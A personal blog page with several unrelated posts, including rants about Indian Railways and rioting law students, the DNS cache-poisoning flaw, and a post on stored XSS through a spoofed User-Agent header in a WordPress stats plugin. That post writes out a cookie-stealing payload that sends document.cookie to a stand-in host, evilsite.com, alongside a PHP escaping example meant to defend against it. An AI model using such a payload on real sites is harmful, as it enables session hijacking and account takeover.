Posts tagged Bad World

Yes. The Internet has never been safer, but only a few things on it are. Now, Google shows that everything in the world is a Harmful Site.

Crazy Google

As some great fellow said, ‘No computer is safe unless it has been switched off and hidden a few meters underground’ – Google has been ‘compromised’.

Edit: Google posted on their blog about the problem and it seems the problem was human error while processing the list from StopBadware.org. Once again Google saves the day. It wasn’t compromised.

I had a ‘weird’ experience today with Indian Railways. I don’t understand what exactly is wrong with our guys (or with me for not being able to understand this). Here is the scene.

  1. I’m in a hurry
  2. I need to buy a ticket for traveling from Tirupati to Madras
  3. Ticket fare is 46/-
  4. They don’t accept credit/debit cards
  5. Not everyone will have exact change of 6 rupees with them, sometimes not even a rupee coin

I stood at the counter, gave him 100/- and asked for a ticket. He politely asked me to give a rupee coin and take my ticket. Well, I don’t have it (not having it is my mistake, I accept). I asked him to keep the change (the remaining 4/-) and give me the ticket and a fifty rupee note. Now, that guy thinks that he is ***** (insert whatever he thinks about himself) and he cannot accept 4 rupees extra. And he gave my 100/- back and asked me to get the 46/- exact fare.

  • Well, come on – I’m not giving any TIP to him. In fact, I think he might be earning more than me (he is a frigging central government employee). I’m not an arrogant bugger who tips rich folks.
  • I just asked him to add the 4 rupees to the counter money as I don’t have any change. I’m willing to lose my 4 rupees as not having change is my mistake.
  • That guy, with all his ego, knowing one fact – that I cannot travel without buying a ticket – refused to sell me the ticket unless I gave him the 46/- exact fare.
  • In simple words – he is willing to cause inconvenience to a passenger but won’t add profit to the Railways, because of his ego.
  • I still cannot understand what his problem was in taking 4 rupees extra and adding it to the counter money. – Yes, he can adjust it for other guys who end up there with a few rupees less. If he cannot take 4 rupees extra, how about giving me the ticket for 1 rupee less fare? (I don’t have any ego issues about taking a rupee from Lord Counter Guy.) No, he won’t do it. I’ve seen so many times at the same counter how they send people away because they have a few rupees less than the fare. I even gave 3/- to an old traveler once when these guys refused to give her a ticket as she had ₨. 3/- less than the fare.

BTW, a few of you folks might be thinking that queues are long in India, so they want exact fare, otherwise it is troublesome. Well, there were only 3 guys standing in the queue (maybe because of today’s solar eclipse, not many travelers were there). Seriously, our guys should grow up and stop troubling a person just because they can. I had to run to a shop and buy chewing gum for that 1 rupee change. Railways should consider accepting credit cards at the counter. There are at least 10% of the passenger population who would be willing to swipe their cards rather than running around getting coins for the ‘lords’ sitting at the counter. I don’t want to trouble another guy for today’s guy’s mistake. Otherwise, next time I would be buying my ticket with 46 one-rupee coins or 92 fifty-paisa coins or a combination of both – just to give him exact change.

Guess you know what DNS is?
If you don’t know what it is …
It’s the Domain Name System. All servers have a set of numbers to identify them (an IP address); to recognize them easily we give them a name (a domain name), and for the Internet to work, DNS maps these names to numbers. (Duh, read Wikipedia for more info.)

For the techie folks who know what DNS is, you might have missed this news. There was a bug. It was just a bug when people didn’t know about it. A few days ago, it was a problem, as bad people knew that it existed. And a couple of days ago, it became a major problem, as bad people got to know how to tame the bug and exploit it. And today, it’s a frigging Pain in the A**, as our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups. Which literally means, when you open Google.com, they can send you to Yahoo.com instead. Search engines need not be a problem, but if they manipulate the DNS of a bank … the answer is … somebody is gonna get hurt real badddddd

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to this bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I’ve tested the BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess we need to take a huge rod and shove it up someone’s a** to make them fix their DNS servers so that we can stay secure.

For extra-super-terrestrial technical folks, I need not tell you about this, but in case you missed it, check (@Securebits) the exploit that was released.

Here are the keywords for the story.

  • Bihar
  • Students
  • Angry
  • Law
  • Exams
  • Rampage
  • Boycott
  • WTF ????

Here is the story.

Hundreds of law students in Bihar went on a rampage because of some issues with the conduct of their exams.

  1. No water
  2. No shade
  3. No quiet environment
  4. No white papers
  5. No chairs
  6. No tables

None of the above is the reason for those students’ anger. The reason is …

“They were denied permission to carry books, copies and mobile phones into the examination hall to COPY while writing their exam”

Yeah, sounds crazy, but that is the reason. This sounds even crazier when you get to know that they actually set the office and classrooms on fire because of that. Want to know the craziest thing of all? All those students who wanted “unfair” means in writing their exams are …. LAW students. Yeah!!! They are going to deliver justice in the court of law.

God bless India.

Filed under: Bad World, WTF

Well, it’s not just done in a funny way, but in a very funny way. Neither through an HTTP GET nor an HTTP POST, but through a header. I hadn’t read about this method of XSS up to now, but seriously, it’s silly and common. Usually webmasters read the traffic stats of their websites, and Referer and User-Agent are very common headers they analyze to know the type of visitors and which site they are coming from.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that, guess what: my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care when looking at your stats (especially in WordPress). Rather than keeping an alert, one can keep something like this:

<img
src="javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;"
style=visibility:hidden />

The above code will send the cookie to the cookie.php page of evilsite.com, and the hacker can collect the cookies there using very simple code and become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use them, so if you really know what you have to do, you must already know this page.

Result: check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it?”
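What “sanitizing the inputs” looks like for a stats page, as an added example that is not the blog’s code or any WordPress plugin’s: every logged header is HTML-escaped before it is echoed, and a Referer only becomes a link when its scheme is http or https, so the spoofed User-Agent above and a javascript: referer both render as plain text. The `$hit` array is a constructed sample standing in for one row of a plugin’s log table.

```php
<?php
// Added example (not the blog's or any plugin's code): render one visitor-stats
// row so that attacker-controlled request headers cannot become markup.

function esc(string $s): string {
    // Escape <, >, &, " and ' so the value is shown as text, never parsed as a tag
    // or attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function safe_referer_link(string $ref): string {
    // Escaping alone does not stop a javascript: URL placed in href, so only
    // http/https referers are linked; anything else is displayed as text.
    $scheme = strtolower((string) parse_url($ref, PHP_URL_SCHEME));
    if ($scheme === 'http' || $scheme === 'https') {
        return '<a href="' . esc($ref) . '" rel="noopener noreferrer">' . esc($ref) . '</a>';
    }
    return esc($ref);
}

function render_stats_row(array $hit): string {
    // Each cell goes through esc(); the referer additionally gets scheme checking.
    return '<tr>'
        . '<td>' . esc($hit['ip']) . '</td>'
        . '<td>' . esc($hit['user_agent']) . '</td>'
        . '<td>' . safe_referer_link($hit['referer']) . '</td>'
        . '</tr>';
}

// Constructed sample hit: the post's spoofed User-Agent plus a javascript: referer
// modelled on the img vector above. A real plugin would read this from its log table.
$hit = [
    'ip'         => '198.51.100.7',
    'user_agent' => '<script>alert(1)</script>',
    'referer'    => 'javascript:document.images[1].src="http://evilsite.com/cookie.php?c="+document.cookie',
];

echo render_stats_row($hit), PHP_EOL;
```

The same two rules apply to any other header a plugin shows (Accept-Language, X-Forwarded-For, and so on): treat it as untrusted text, and never build a URL attribute from it without checking the scheme.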
